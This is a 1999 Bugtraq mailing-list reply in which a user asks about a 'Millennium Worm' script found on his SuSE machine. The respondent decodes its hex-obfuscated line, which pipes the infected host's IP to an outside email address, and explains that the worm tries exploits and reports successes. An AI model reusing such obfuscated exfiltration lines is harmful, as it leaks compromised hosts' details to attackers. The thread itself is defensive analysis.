[11766] in bugtraq
Re: MW
daemon@ATHENA.MIT.EDU (Peter van Dijk)
Thu Sep 9 02:26:55 1999
Mail-Followup-To: BUGTRAQ@SECURITYFOCUS.COM
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Message-Id: <19990904183949.L26571@attic.vuurwerk.nl>
Date: Sat, 4 Sep 1999 18:39:49 +0200
Reply-To: Peter van Dijk <peter@ATTIC.VUURWERK.NL>
From: Peter van Dijk <peter@ATTIC.VUURWERK.NL>
X-To: BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <37CCD1BD.69C3E9EE@weikert-bensheim.de>; from Christian Koderer
on Wed, Sep 01, 1999 at 09:11:57AM +0200
On Wed, Sep 01, 1999 at 09:11:57AM +0200, Christian Koderer wrote:
> Knows anybody MW (millennium worm?) and how i get my s.u.s.e
> installation clean?
>
> "#!/bin/.mwsh
> # Millennium Worm by Anonymous
> # If you found this on your machine, but didn't download it
> # well.. you have a problem :)
I think you indeed do have a problem here :)
[snip]
> ./IP | mail `printf
> "\x62\x65\x75\x72\x70\x40\x68\x6f\x74\x6d\x61\x69\x6c\x2e\x63\x6f\x6d"`
beurp@hotmail.com
Looks like a worm that tries a couple of exploits and mails
beurp@hotmail.com when successful.
Greetz, Peter
--
| 'He broke my heart, | Peter van Dijk |
I broke his neck' | peter@attic.vuurwerk.nl |
nognikz - As the sun | Hardbeat@ircnet - #cistron/#linux.nl |
http://www.nognikz.mdk.nu/ | Hardbeat@undernet - #groningen/#kinkfm/#vdh |
